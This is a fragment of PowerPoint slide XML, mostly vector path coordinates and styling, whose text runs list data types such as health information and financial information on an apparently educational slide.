                  <a:lnTo>
                    <a:pt x="457200" y="914399"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="410458" y="912039"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="365066" y="905110"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="321253" y="893842"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="279249" y="878466"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="239283" y="859212"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="201587" y="836309"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="166390" y="809988"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="133921" y="780478"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="104411" y="748009"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="78090" y="712812"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="55187" y="675116"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="35933" y="635150"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20557" y="593146"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9289" y="549333"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2360" y="503941"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="457199"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="25400">
              <a:solidFill>
                <a:srgbClr val="0075C4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34539" y="5801868"/>
              <a:ext cx="539495" cy="5410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36383" y="306451"/>
            <a:ext cx="198310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85">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Data</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-180">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="70">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Types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01028" y="725423"/>
            <a:ext cx="2880360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831592" y="3166872"/>
            <a:ext cx="11774805" cy="814069"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="11774805" h="814070">
                <a:moveTo>
                  <a:pt x="11638788" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="135635" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="92756" y="6912"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="55522" y="26164"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26164" y="55522"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6912" y="92756"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="135636"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="678179"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6912" y="721059"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26164" y="758293"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="55522" y="787651"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="92756" y="806903"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="135635" y="813815"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11638788" y="813815"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11681667" y="806903"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11718901" y="787651"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11748259" y="758293"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11767511" y="721059"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11774423" y="678179"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11774423" y="135636"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11767511" y="92756"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11748259" y="55522"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11718901" y="26164"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11681667" y="6912"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11638788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949955" y="3393694"/>
            <a:ext cx="898588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0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>Health</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-13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0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>information:</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="20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0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>Includes</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="20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0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>medical</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="20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5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0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0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>insurance</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="20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0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>records</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-13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5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0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5">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>test</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="20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0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>results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854961" y="3104642"/>
            <a:ext cx="937260" cy="939800"/>
            <a:chOff x="1854961" y="3104642"/>
            <a:chExt cx="937260" cy="939800"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7" name="object 7"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1867661" y="3117342"/>
              <a:ext cx="911860" cy="914400"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="911860" h="914400">
                  <a:moveTo>
                    <a:pt x="455675" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="409077" y="2360"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="363826" y="9289"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="320152" y="20557"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="278284" y="35933"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="238451" y="55187"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="200880" y="78090"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="165802" y="104411"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="133445" y="133921"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="104037" y="166390"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="77808" y="201587"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54987" y="239283"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="35802" y="279249"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20481" y="321253"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9255" y="365066"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2352" y="410458"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="457200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2352" y="503941"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9255" y="549333"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20481" y="593146"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="35802" y="635150"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54987" y="675116"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="77808" y="712812"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="104037" y="748009"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="133445" y="780478"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="165802" y="809988"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="200880" y="836309"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="238451" y="859212"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="278284" y="878466"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="320152" y="893842"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="363826" y="905110"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="409077" y="912039"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="455675" y="914400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="502274" y="912039"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="547525" y="905110"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="591199" y="893842"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="633067" y="878466"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="672900" y="859212"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="710471" y="836309"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="745549" y="809988"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="777906" y="780478"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="807314" y="748009"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="833543" y="712812"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="856364" y="675116"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="875549" y="635150"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="890870" y="593146"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="902096" y="549333"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="908999" y="503941"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="911351" y="457200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="908999" y="410458"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="902096" y="365066"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="890870" y="321253"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="875549" y="279249"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="856364" y="239283"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="833543" y="201587"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="807314" y="166390"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="777906" y="133921"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="745549" y="104411"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="710471" y="78090"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="672900" y="55187"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="633067" y="35933"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="591199" y="20557"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="547525" y="9289"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="502274" y="2360"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="455675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867661" y="3117342"/>
              <a:ext cx="911860" cy="914400"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="911860" h="914400">
                  <a:moveTo>
                    <a:pt x="0" y="457200"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2352" y="410458"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9255" y="365066"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20481" y="321253"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="35802" y="279249"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54987" y="239283"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="77808" y="201587"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="104037" y="166390"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="133445" y="133921"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="165802" y="104411"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="200880" y="78090"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="238451" y="55187"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="278284" y="35933"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="320152" y="20557"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="363826" y="9289"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="409077" y="2360"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="455675" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="502274" y="2360"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="547525" y="9289"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="591199" y="20557"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="633067" y="35933"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="672900" y="55187"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="710471" y="78090"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="745549" y="104411"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="777906" y="133921"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="807314" y="166390"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="833543" y="201587"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="856364" y="239283"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="875549" y="279249"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="890870" y="321253"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="902096" y="365066"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="908999" y="410458"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="911351" y="457200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="908999" y="503941"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="902096" y="549333"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="890870" y="593146"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="875549" y="635150"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="856364" y="675116"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="833543" y="712812"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="807314" y="748009"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="777906" y="780478"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="745549" y="809988"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="710471" y="836309"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="672900" y="859212"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="633067" y="878466"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="591199" y="893842"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="547525" y="905110"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="502274" y="912039"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="455675" y="914400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="409077" y="912039"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="363826" y="905110"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="320152" y="893842"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="278284" y="878466"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="238451" y="859212"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="200880" y="836309"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="165802" y="809988"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="133445" y="780478"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="104037" y="748009"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="77808" y="712812"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54987" y="675116"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="35802" y="635150"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20481" y="593146"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9255" y="549333"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2352" y="503941"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="457200"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="25400">
              <a:solidFill>
                <a:srgbClr val="0075C4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16251" y="3336036"/>
              <a:ext cx="591312" cy="539496"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="object 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2741676" y="4527803"/>
            <a:ext cx="11864340" cy="812800"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="11864340" h="812800">
                <a:moveTo>
                  <a:pt x="11728958" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="135381" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="92577" y="6898"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="55412" y="26111"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26111" y="55412"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6898" y="92577"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="135382"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="676910"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6898" y="719714"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26111" y="756879"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="55412" y="786180"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="92577" y="805393"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="135381" y="812292"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11728958" y="812292"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11771762" y="805393"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11808927" y="786180"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11838228" y="756879"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11857441" y="719714"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11864340" y="676910"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11864340" y="135382"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11857441" y="92577"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11838228" y="55412"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11808927" y="26111"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11771762" y="6898"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11728958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860929" y="4756150"/>
            <a:ext cx="1117155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45">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>Financial</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="20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0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>information:</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="20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0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>Includes</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="20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5">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>information</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-14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5">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>about</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="20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5">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>financial</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="20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5">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>transactions,</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-13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95">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>tax,</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="20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0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>payroll,</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="20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5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0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3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>more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809242" y="4465573"/>
            <a:ext cx="939800" cy="939800"/>
            <a:chOff x="1809242" y="4465573"/>
            <a:chExt cx="939800" cy="939800"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13" name="object 13"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1821942" y="4478273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200" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="410458" y="2360"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="365066" y="9289"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="321253" y="20557"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="279249" y="35933"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="239283" y="55187"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="201587" y="78090"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="166390" y="104411"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="133921" y="133921"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="104411" y="166390"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="78090" y="201587"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="55187" y="239283"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="35933" y="279249"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20557" y="321253"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9289" y="365066"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2360" y="410458"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="457200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2360" y="503941"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9289" y="549333"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20557" y="593146"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="35933" y="635150"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="55187" y="675116"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="78090" y="712812"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="104411" y="748009"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="133921" y="780478"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="166390" y="809988"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="201587" y="836309"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="239283" y="859212"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="279249" y="878466"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="321253" y="893842"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="365066" y="905110"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="410458" y="912039"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="457200" y="914400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="503941" y="912039"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="549333" y="905110"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="593146" y="893842"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="635150" y="878466"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="675116" y="859212"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="712812" y="836309"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="748009" y="809988"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="780478" y="780478"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="809988" y="748009"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="836309" y="712812"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="859212" y="675116"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="878466" y="635150"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="893842" y="593146"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="905110" y="549333"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="912039" y="503941"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="914400" y="457200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="912039" y="410458"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="905110" y="365066"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="893842" y="321253"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="878466" y="279249"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="859212" y="239283"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="836309" y="201587"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="809988" y="166390"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="780478" y="133921"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="748009" y="104411"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="712812" y="78090"/>
                  </a:lnTo>
